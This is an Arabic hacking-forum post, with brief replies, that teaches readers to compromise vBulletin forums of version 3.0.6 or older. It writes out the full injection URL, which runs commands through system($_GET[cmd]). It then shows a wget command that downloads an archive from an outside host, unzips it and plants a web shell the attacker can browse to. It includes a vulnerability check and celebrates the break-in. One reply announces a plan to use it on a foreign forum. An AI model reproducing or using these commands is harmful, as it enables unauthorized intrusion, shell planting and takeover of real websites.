بسم الله مع ثاني مشاركة أشرح لكم هذه الثغرة الخطيرة
نبدأ الشرح:::
أولا قم باختيار منتدى اصداره يكون 3.0.6 أو أقل
ثانياً ضع بعده هذا اللنك
misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=id
اذا طلع لك شاشة بيضاء يعني المنتدى غير مصاب بالثغرة أما إذا طلع لك :
http://www.s4a.cc/up/images/vb1.GIF
فمعناه أن المنتدى مصاب بالثغرة
ثالثاً نقوم باستعراض مكاننا بالموقع بالأمر pwd فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=pwd
يطلع لك مثل الصورة:
http://www.s4a.cc/up/images/vb2.GIF
نقوم بوضع الأمر wget http://hkr-ksa.com/xp10/hitler.zip
فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=wget http://hkr-ksa.com/xp10/hitler.zip
سيظهر لك شاشة بيضاء أعطيها مدة 5-10 ثواني ثم قم بوضع الأمر unzip hitler.zip فيصبح اللنك هكذا:
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=unzip hitler.zip
ستظهر لك مثل هذه الصورة:
http://www.s4a.cc/up/images/vb3.GIF

مبرووك الآن اخترقت المنتدى رفعت الويب أدمن
الآن ادخل إلى :
www.OOO.com/vb/khitler.php
واستمتع بالإختراق
* ملاحظة www.OOO.com/vb استبدله بعنوان الموقع
---------------------
جميع الحقوق محفوظة لـX-jAyA-X
---------------------

شكرا لك


سأقوم بتطبيق ذلك على منتدى اجنبي واخبرك بالنتجية



لك تحياتي